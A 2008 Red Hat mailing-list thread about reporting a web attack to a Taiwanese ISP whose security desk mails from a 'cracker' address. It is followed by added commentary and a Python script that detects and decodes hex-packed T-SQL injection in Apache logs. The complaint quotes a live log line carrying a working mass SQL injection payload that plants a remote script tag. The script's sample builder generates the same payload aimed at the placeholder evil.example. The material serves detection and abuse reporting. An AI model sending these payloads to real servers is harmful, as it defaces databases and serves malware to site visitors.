Personally, I just blocked all of APNIC... They're the source of over 90% of my issues, and I don't really care if I make them mad. Of course, you might not be able to do that if you're running a business...

-----Original Message-----
From: redhat-list-bounces@xxxxxxxxxx [mailto:redhat-list-bounces@xxxxxxxxxx] On Behalf Of Jose R R
Sent: Wednesday, August 27, 2008 12:05 AM
To: General Red Hat Linux discussion list
Subject: Infiltration of ISP providers by crackers.

So ...(sigh) what do you do when you complain to a given ISP provider about a case of attempted abuse by one of their IP addresses and you get a response from someone in the "security team" whose email name is "cracker?"

Apparently some (or many) of these crackers own (with their consent or not) even their ISP providers --or worse, some (or many) ISP providers may be crackers themselves!

A portion of my original complaint to the ISP --where I list one of the attempted abuse records by the cracker for informational purposes:

----------------------------------------------------------------------------------
from       myself <my_email_address>
to         network-adm@xxxxxxxxx, network-center@xxxxxxxxx
date       Mon, Aug 25, 2008 at 11:37 PM
subject    Abuse by user at IP address 118.167.20.180
mailed-by  my_domain

On August 25, 2008, from 08:52:10 am to 08:52:28 am (America/Tijuana time), user at IP address 118.167.20.180 abused <my> web site with the below referenced offending code (relevant web server log section is attached and named as abuse-118_167_20_180.txt).
118.167.20.180 - - [25/Aug/2008:08:52:10 -0700] "GET /blog/index.php/2008/07/12/xenserver-4-1-and-32-bit-and-64-bit-virt?blog=4';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1; .NET CLR 1.1.4322)"
[...]

I would appreciate your cooperation in stopping this sort of cracker engagement. Thank you in advance for your prompt attention to this issue.
---------------End of portion of email sent----------------------------------------------------------------------------

Below is an interesting section of one of the replies:

-------------------------------------------------------------------
Return-Path: <my_email_address>
Received: from localhost (localhost [127.0.0.1])
        by dns.adsl.hinet.net (8.12.3/8.12.3/Debian-6.6) with ESMTP id m7QA4XUN014545
        for <cracker@localhost>; Tue, 26 Aug 2008 18:06:31 +0800
[...]
----------End of unformatted reply----------------------------------------------------------

The above was attached to the formatted email reply below:

----------------------------------------------------------------------
from       cracker@xxxxxxxxx
to         <my_email_address>
date       Tue, Aug 26, 2008 at 4:24 AM
subject    [HiNetSOC/Craker : 1219749049] HiNet Notification
mailed-by  lcss.hinet.net

Dear Sir:

Thank you for your email. Please kindly provide us more detail information about the bad behavior at least including the attackers' IP address, time (GMT, Greenwich Mean Time) and evidence for further processing.

Yours sincerely,
HiNet Security Operation Center
Chunghwa Telecom Co., Ltd.
Taipei, Taiwan, R.O.C.
Email: cracker@xxxxxxxxx

Please refer to your original complaint email and the attached file.
------End of formatted email reply-------------------------------------------------------------------

No wonder spam and intrusion attempts never end.

Jose R R
http://www.metztli-it.com
IBM Lotus Symphony <http://symphony.lotus.com> is officially supported on RH and SuSE; official Ubuntu support coming at the end of August 2008.

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
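The request logged in the complaint above is the hex-packed T-SQL injection that was being sprayed at every web server in 2008: the query string carries `DECLARE @S CHAR(4000);SET @S=CAST(0x... AS CHAR(4000));EXEC(@S)`, and the hex decodes to a cursor over sysobjects/syscolumns that appends a `<script src=...>` tag to every text column of every user table. It only does anything against classic ASP in front of Microsoft SQL Server, so a PHP blog on Red Hat is not at risk from it, but the decoded script host is the indicator worth blocking and hunting for, and an abuse desk asking for "evidence" wants exactly that. The script below is an added example written for this thread, not code from the post or from Red Hat: it parses httpd combined-format lines, spots the CAST(0x...) wrapper (tolerating hex wrapped across lines, as happened when the log was pasted into the mail), decodes it the way SQL Server's CAST would (latin-1 for CHAR/VARCHAR, UTF-16LE for the NCHAR/NVARCHAR variant the same kits also used), and pulls out the injected script URLs. The sample log lines are constructed: the payload is the same cursor-walking T-SQL the post's hex decodes to, with the script host replaced by the placeholder evil.example and client addresses taken from documentation ranges.

```python
"""Flag and decode hex-packed T-SQL injection attempts in httpd access logs.

Added example for this thread, not code from the post or from Red Hat.
The sample log lines are constructed: the request shape mirrors the one in
the post, but the client addresses are documentation ranges and the script
host evil.example is a placeholder, not the real injected domain.
"""
import re
import urllib.parse
from dataclasses import dataclass

# Apache "combined" format: the request line is the first double-quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# The kit's wrapper: SET @S=CAST(0x<hex> AS CHAR(4000)) or NVARCHAR(4000).
# Whitespace is allowed inside the hex so a line wrapped by a mail client
# (as in the post) still matches; 'S' is not a hex digit, so " AS " can
# never be mistaken for payload bytes.
CAST_RE = re.compile(
    r'CAST\(\s*0x(?P<hex>[0-9A-Fa-f\s]+?)\s+AS\s+'
    r'(?P<type>N?(?:VAR)?CHAR)\s*\(\s*\d+\s*\)\s*\)',
    re.IGNORECASE,
)
SCRIPT_SRC_RE = re.compile(r'<script\s+src=["\']?([^"\'>\s]+)', re.IGNORECASE)


@dataclass
class Finding:
    ip: str
    timestamp: str
    status: str        # 400 = httpd refused it; a 200 from an ASP site is the one to chase
    decoded_sql: str
    script_urls: list  # the injected <script src=...>: what to block and hunt for


def decode_cast_hex(hexblob: str, sqltype: str) -> str:
    """Turn the 0x... literal back into the text SQL Server's CAST would produce."""
    raw = bytes.fromhex(re.sub(r'\s+', '', hexblob))      # tolerate wrapped hex
    if sqltype.upper().startswith('N'):                    # NCHAR/NVARCHAR are UTF-16LE
        return raw.decode('utf-16-le', errors='replace')
    return raw.decode('latin-1')                           # single-byte collation


def analyse_line(line: str):
    """Return a Finding if the request carries a CAST(0x...) packed payload, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group('req').split(' ')                      # METHOD target HTTP/x.y
    target = parts[1] if len(parts) > 1 else parts[0]
    decoded = urllib.parse.unquote(target)                 # %20 -> ' ', %22 -> '"', ...
    cast = CAST_RE.search(decoded)
    if cast is None:
        return None
    try:
        sql = decode_cast_hex(cast.group('hex'), cast.group('type'))
    except ValueError:                                     # odd-length or junk hex
        sql = '<undecodable hex literal>'
    return Finding(m.group('ip'), m.group('ts'), m.group('status'),
                   sql, SCRIPT_SRC_RE.findall(sql))


def scan(lines):
    """Findings for every line of an access log, in file order."""
    return [f for f in map(analyse_line, lines) if f is not None]


# --- constructed samples -------------------------------------------------
# Cursor over sysobjects/syscolumns that appends a <script> tag to every
# text column: the payload family seen in 2008, with a placeholder URL.
INJECTED_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and "
    "a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''\"></title>"
    "<script src=\"http://evil.example/w.js\"></script><!--''+['+@C+']') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)


def hexpack(sql: str, sqltype: str = 'CHAR') -> str:
    """Wrap SQL the way the kit did (used only to build the samples below)."""
    raw = sql.encode('utf-16-le') if sqltype.startswith('N') else sql.encode('latin-1')
    wrapper = (f"';DECLARE @S {sqltype}(4000);SET @S=CAST(0x{raw.hex().upper()}"
               f" AS {sqltype}(4000));EXEC(@S);")
    return urllib.parse.quote(wrapper, safe="';@=()")


SAMPLE_LOG = [
    '203.0.113.7 - - [25/Aug/2008:08:52:10 -0700] "GET /blog/index.php?blog=4'
    + hexpack(INJECTED_SQL) + ' HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"',
    '203.0.113.8 - - [25/Aug/2008:09:14:02 -0700] "GET /products.asp?id=17'
    + hexpack(INJECTED_SQL, 'NVARCHAR') + ' HTTP/1.1" 200 8123 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [25/Aug/2008:09:15:44 -0700] "GET /blog/index.php?blog=4 HTTP/1.1" '
    '200 14311 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f.ip} [{f.timestamp}] status={f.status} script_src={f.script_urls}")
        print("    " + f.decoded_sql[:90] + " ...")
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file's lines; pasting the single log line from the complaint above works too, and the whitespace the mail client inserted into the hex is stripped before decoding. Two things the output tells you that the raw line does not: the HTTP status says whether the payload ever reached an application (the post's 400 means httpd refused the request; a 200 on an ASP page backed by SQL Server is the case to investigate), and the decoded `script src` host is the artefact to put in an abuse report, a proxy block list, and a hunt across stored content.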